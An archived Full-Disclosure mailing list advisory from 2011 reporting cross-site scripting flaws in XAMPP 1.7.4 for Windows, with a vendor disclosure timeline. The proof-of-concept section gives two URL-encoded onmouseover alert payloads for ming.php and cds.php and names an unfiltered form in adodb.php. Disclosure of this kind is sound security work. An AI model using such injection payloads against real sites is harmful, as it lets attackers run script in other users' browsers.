'[Full-disclosure] XAMPP 1.7.4 XSS vulnerabilities'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [Full-disclosure] XAMPP 1.7.4 XSS vulnerabilities
From:       sangte amtham <sangteamtham () gmail ! com>
Date:       2011-10-27 18:45:20
Message-ID: CADO=9dJKk70h2M5Zxp4OjWrqPXrABXtGi2xrmk3XN=_ccpx90A () mail ! gmail ! com
[Download RAW message or body]

[Attachment #2 (multipart/alternative)]


Please download the attachment

[Attachment #5 (text/html)]

Please download the attachment<br>
<br>

--20cf305b1080af775504b04c2c58--
["xampp.txt" (text/plain)]

$------------------------------------------------------------------------------------------------------------------- \
 $ Xampp 1.7.4 for Windows multiple Site Scripting Vulnerabilities 
$ Author : Sangteamtham 
$ Home : Hcegroup.net 
$ Download :http://www.apachefriends.org/en/xampp-windows.html 
$ Date :07/12/2011 
$ Twitter: http://twitter.com/Sangte_amtham
$****************************************************************************************** 
1.Description:

 XAMPP is an easy to install Apache distribution containing MySQL, PHP and Perl. XAMPP is \
really   very easy to install and to use - just download, extract and start.
 
2. Patch:

 Jul 12, 2011: Contact to vendor.
 Jul 12, 2011: Vendor said that they would fix in next release
 Sep 21, 2011: Released XAMPP 1.7.7 
 Oct 27, 2011: Release the bug.

3. POC:

http://localhost/xampp/ming.php?text=%22%20onmouseover%3dalert%28%22XSS%22%29%20bad%22

http://localhost/xampp/cds.php/%27onmouseover=alert%28%22XSS%22%29%3E

In adodb.php, we have a form to submit database information, but this form is not filer well. \
So web can submit the  malicious codes. 

http://localhost/xampp/adodb.php


$****************************************************************************************** 
$ Greetz to: All Vietnamese hackers and Hackers out there researching for more security 
$ 
$ 
$--------------------------------------------------------------------------------------------------------------------




_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic